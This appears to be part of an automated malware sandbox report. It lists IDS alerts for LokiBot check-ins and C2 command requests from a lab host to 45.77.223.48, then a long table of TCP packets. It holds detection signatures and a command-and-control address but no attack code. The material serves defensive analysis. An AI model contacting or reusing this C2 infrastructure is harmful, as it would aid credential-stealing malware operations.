04/26/24-04:43:24.904349	TCP	2025381	ET TROJAN LokiBot Checkin	49797	80	192.168.2.4	45.77.223.48
04/26/24-04:43:23.393350	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49796	80	192.168.2.4	45.77.223.48
04/26/24-04:43:38.519329	TCP	2025381	ET TROJAN LokiBot Checkin	49804	80	192.168.2.4	45.77.223.48
04/26/24-04:43:50.432496	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49812	80	192.168.2.4	45.77.223.48
04/26/24-04:43:10.461205	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49787	80	192.168.2.4	45.77.223.48
04/26/24-04:43:11.850756	TCP	2025381	ET TROJAN LokiBot Checkin	49788	80	192.168.2.4	45.77.223.48
04/26/24-04:43:41.435996	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49806	80	192.168.2.4	45.77.223.48
04/26/24-04:42:30.890483	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49760	80	192.168.2.4	45.77.223.48
04/26/24-04:43:35.596260	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49803	80	192.168.2.4	45.77.223.48
04/26/24-04:42:30.890483	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49760	80	192.168.2.4	45.77.223.48
04/26/24-04:43:29.172203	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49800	80	192.168.2.4	45.77.223.48
04/26/24-04:42:52.847994	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49774	80	192.168.2.4	45.77.223.48
04/26/24-04:42:44.797094	TCP	2025381	ET TROJAN LokiBot Checkin	49769	80	192.168.2.4	45.77.223.48
04/26/24-04:42:05.836233	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49739	80	192.168.2.4	45.77.223.48
04/26/24-04:42:15.814851	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49745	80	192.168.2.4	45.77.223.48
04/26/24-04:43:08.959356	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49786	80	192.168.2.4	45.77.223.48
04/26/24-04:42:07.242464	TCP	2025381	ET TROJAN LokiBot Checkin	49740	80	192.168.2.4	45.77.223.48
04/26/24-04:42:54.249806	TCP	2025381	ET TROJAN LokiBot Checkin	49775	80	192.168.2.4	45.77.223.48
04/26/24-04:42:43.312556	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49768	80	192.168.2.4	45.77.223.48
04/26/24-04:43:00.052049	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49780	80	192.168.2.4	45.77.223.48
04/26/24-04:43:08.959356	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49786	80	192.168.2.4	45.77.223.48
04/26/24-04:43:17.632927	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49792	80	192.168.2.4	45.77.223.48
04/26/24-04:42:15.814851	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49745	80	192.168.2.4	45.77.223.48
04/26/24-04:43:17.632927	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49792	80	192.168.2.4	45.77.223.48
04/26/24-04:43:45.956580	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49809	80	192.168.2.4	45.77.223.48
04/26/24-04:43:45.956580	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49809	80	192.168.2.4	45.77.223.48

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 26, 2024 04:42:02.744220018 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:02.933562040 CEST	80	49735	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:02.933651924 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:02.935480118 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:03.130639076 CEST	80	49735	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:03.130712032 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:03.319757938 CEST	80	49735	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:04.099225044 CEST	80	49735	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:04.099363089 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:04.099849939 CEST	80	49735	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:04.099910975 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:04.099992037 CEST	80	49735	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:04.100044966 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:04.109543085 CEST	80	49735	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:04.109600067 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:04.109834909 CEST	80	49735	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:04.109879971 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:04.110028028 CEST	80	49735	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:04.110044003 CEST	80	49735	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:04.110073090 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:04.110089064 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:04.110208035 CEST	80	49735	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:04.110248089 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:04.110270977 CEST	80	49735	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:04.110311031 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:04.110337973 CEST	80	49735	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:04.110378981 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:04.234833956 CEST	49736	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:04.287754059 CEST	80	49735	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:04.287851095 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:04.287906885 CEST	80	49735	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:04.287955046 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:04.288305044 CEST	80	49735	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:04.288342953 CEST	49735	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:04.424607992 CEST	80	49736	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:04.424679995 CEST	49736	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:04.426692009 CEST	49736	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:04.614244938 CEST	80	49736	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:04.614386082 CEST	49736	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:04.802763939 CEST	80	49736	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:05.587521076 CEST	80	49736	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:05.587621927 CEST	49736	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:05.587862015 CEST	80	49736	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:05.587908983 CEST	49736	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:05.587946892 CEST	80	49736	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:05.587989092 CEST	49736	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:05.598576069 CEST	80	49736	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:05.598642111 CEST	49736	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:05.599412918 CEST	80	49736	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:05.599459887 CEST	49736	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:05.599534035 CEST	80	49736	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:05.599581957 CEST	49736	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:05.599654913 CEST	80	49736	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:05.599695921 CEST	49736	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:05.600627899 CEST	80	49736	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:05.600692987 CEST	80	49736	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:05.600716114 CEST	49736	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:05.600725889 CEST	49736	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:05.600725889 CEST	80	49736	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:05.600784063 CEST	49736	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:05.644999981 CEST	49739	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:05.776321888 CEST	80	49736	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:05.776369095 CEST	49736	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:05.776479006 CEST	80	49736	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:05.776494026 CEST	80	49736	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:05.776514053 CEST	49736	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:05.776556969 CEST	49736	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:05.834322929 CEST	80	49739	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:05.834388971 CEST	49739	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:05.836232901 CEST	49739	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:06.025075912 CEST	80	49739	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:06.025144100 CEST	49739	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:06.213613987 CEST	80	49739	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:06.904539108 CEST	80	49739	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:06.904690981 CEST	80	49739	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:06.904705048 CEST	80	49739	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:06.904776096 CEST	49739	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:06.904776096 CEST	49739	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:06.905072927 CEST	49739	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:06.912899017 CEST	80	49739	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:06.913083076 CEST	80	49739	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:06.913151979 CEST	49739	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:06.913151979 CEST	49739	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:06.913249969 CEST	80	49739	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:06.913366079 CEST	80	49739	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:06.913434982 CEST	49739	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:06.913434982 CEST	49739	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:06.913522005 CEST	80	49739	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:06.913640022 CEST	80	49739	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:06.913676977 CEST	80	49739	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:06.913701057 CEST	49739	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:06.913722992 CEST	49739	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:07.053894997 CEST	49740	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:07.094361067 CEST	80	49739	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:07.094443083 CEST	49739	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:07.094449997 CEST	80	49739	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:07.094504118 CEST	49739	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:07.094532013 CEST	80	49739	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:07.094583988 CEST	49739	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:07.240298033 CEST	80	49740	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:07.240515947 CEST	49740	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:07.242464066 CEST	49740	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:07.429253101 CEST	80	49740	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:07.429464102 CEST	49740	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:07.616425037 CEST	80	49740	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:08.444988012 CEST	80	49740	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:08.445014000 CEST	80	49740	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:08.445091963 CEST	49740	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:08.445174932 CEST	49740	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:08.445220947 CEST	80	49740	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:08.445271969 CEST	49740	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:08.471952915 CEST	80	49740	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:08.472017050 CEST	49740	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:08.472357035 CEST	80	49740	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:08.472412109 CEST	49740	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:08.472496033 CEST	80	49740	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:08.472587109 CEST	49740	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:08.472635984 CEST	80	49740	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:08.472681046 CEST	49740	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:08.473453045 CEST	80	49740	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:08.473515034 CEST	49740	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:08.473562956 CEST	80	49740	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:08.473607063 CEST	49740	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:08.473640919 CEST	80	49740	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:08.473685980 CEST	49740	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:08.577286005 CEST	49741	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:08.631520033 CEST	80	49740	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:08.631598949 CEST	49740	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:08.631602049 CEST	80	49740	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:08.631656885 CEST	49740	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:08.766238928 CEST	80	49741	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:08.766350031 CEST	49741	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:08.768305063 CEST	49741	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:08.956935883 CEST	80	49741	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:08.957061052 CEST	49741	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:09.145184994 CEST	80	49741	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:09.833314896 CEST	80	49741	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:09.833411932 CEST	80	49741	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:09.833451986 CEST	80	49741	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:09.833499908 CEST	49741	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:09.833590031 CEST	49741	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:09.841272116 CEST	80	49741	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:09.841339111 CEST	49741	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:09.841691017 CEST	80	49741	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:09.841747999 CEST	49741	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:09.841867924 CEST	80	49741	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:09.841908932 CEST	80	49741	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:09.841919899 CEST	49741	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:09.841954947 CEST	49741	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:09.842154026 CEST	80	49741	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:09.842207909 CEST	49741	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:09.842238903 CEST	80	49741	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:09.842292070 CEST	49741	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:09.842323065 CEST	80	49741	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:09.842374086 CEST	49741	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:09.971904993 CEST	49742	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:10.158895969 CEST	80	49742	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:10.159020901 CEST	49742	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:10.160803080 CEST	49742	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:10.349966049 CEST	80	49742	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:10.350081921 CEST	49742	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:10.539710045 CEST	80	49742	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:11.220868111 CEST	80	49742	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:11.220902920 CEST	80	49742	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:11.221009016 CEST	49742	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:11.221091032 CEST	49742	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:11.221327066 CEST	80	49742	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:11.221396923 CEST	49742	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:11.221472979 CEST	80	49742	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:11.221555948 CEST	49742	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:11.230864048 CEST	80	49742	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:11.230925083 CEST	49742	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:11.231679916 CEST	80	49742	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:11.231738091 CEST	49742	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:11.231879950 CEST	80	49742	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:11.231937885 CEST	80	49742	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:11.231941938 CEST	49742	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:11.231998920 CEST	49742	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:11.232424021 CEST	80	49742	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:11.232480049 CEST	49742	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:11.232522964 CEST	80	49742	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:11.232574940 CEST	49742	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:11.364975929 CEST	49743	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:11.409898043 CEST	80	49742	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:11.409966946 CEST	49742	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:11.410187006 CEST	80	49742	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:11.410242081 CEST	49742	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:12.376254082 CEST	49743	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:12.563710928 CEST	80	49743	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:12.563795090 CEST	49743	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:12.565965891 CEST	49743	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:12.752487898 CEST	80	49743	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:12.752552986 CEST	49743	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:12.940715075 CEST	80	49743	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:13.653037071 CEST	80	49743	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:13.653060913 CEST	80	49743	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:13.653122902 CEST	49743	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:13.653166056 CEST	49743	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:13.653183937 CEST	80	49743	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:13.653227091 CEST	49743	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:13.661458969 CEST	80	49743	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:13.661504984 CEST	49743	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:13.661822081 CEST	80	49743	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:13.661869049 CEST	49743	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:13.661916018 CEST	80	49743	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:13.661952019 CEST	49743	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:13.662199020 CEST	80	49743	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:13.662240982 CEST	49743	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:13.662368059 CEST	80	49743	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:13.662410021 CEST	49743	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:13.662462950 CEST	80	49743	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:13.662502050 CEST	49743	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:13.662504911 CEST	80	49743	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:13.662549973 CEST	49743	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:13.840751886 CEST	80	49743	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:13.840802908 CEST	80	49743	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:13.840832949 CEST	49743	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:13.840856075 CEST	49743	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:13.850209951 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:14.038502932 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:14.038575888 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:14.041821003 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:14.228970051 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:14.229063988 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:14.416245937 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.182286024 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.182529926 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.182548046 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.182584047 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:15.204698086 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.204768896 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:15.205224991 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.205243111 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.205295086 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.205298901 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:15.205383062 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.205436945 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:15.205466986 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.205483913 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.205524921 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:15.370666027 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.370732069 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.370790958 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:15.377254963 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.377315998 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.377368927 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:15.391863108 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.392014027 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.392169952 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:15.397023916 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:15.403417110 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.403467894 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:15.403481007 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.403518915 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:15.416536093 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.416579962 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:15.416743040 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.416779995 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:15.430026054 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.430094957 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:15.430109024 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.430151939 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:15.443129063 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.443173885 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:15.443232059 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.443267107 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:15.456304073 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.456345081 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.456370115 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:15.456392050 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:15.470069885 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.470108032 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.470118046 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:15.470148087 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:15.483952045 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.484004021 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.484011889 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:15.484044075 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:15.559034109 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.559082985 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.559098959 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:15.559120893 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:15.565628052 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.565690041 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.565701962 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:15.565733910 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:15.577440023 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.577496052 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:15.577497005 CEST	80	49744	45.77.223.48	192.168.2.4
Apr 26, 2024 04:42:15.577538013 CEST	49744	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:15.623939037 CEST	49745	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:42:15.812635899 CEST	80	49745	45.77.223.48	192.168.2.4
